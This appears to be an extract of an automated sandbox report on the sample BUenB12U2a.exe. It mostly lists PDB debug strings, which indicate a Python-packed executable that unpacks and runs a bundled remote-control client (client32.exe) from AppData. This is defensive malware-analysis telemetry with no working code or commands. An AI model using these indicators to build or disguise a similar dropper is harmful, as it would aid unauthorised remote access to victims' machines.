                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.2048240010.00007FFE13320000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578656714.0000000072A02000.00000002.00000001.01000000.00000018.sdmp, client32.exe, 00000009.00000002.1882967027.0000000072A02000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\re source: BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047920798.00007FFE13303000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.2046552473.00007FFE1024D000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000000.1797525197.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000006.00000002.3573445263.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000002.1881091510.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000000.1879479005.0000000000A62000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAF59000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577865426.000000006CB81000.00000020.00000001.01000000.0000001A.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2046822337.00007FFE10307000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047481292.00007FFE11EDD000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047013819.00007FFE11518000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2041453144.00007FFDFABA0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\AudioCapture\Release\AudioCapture.pdb source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047703009.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
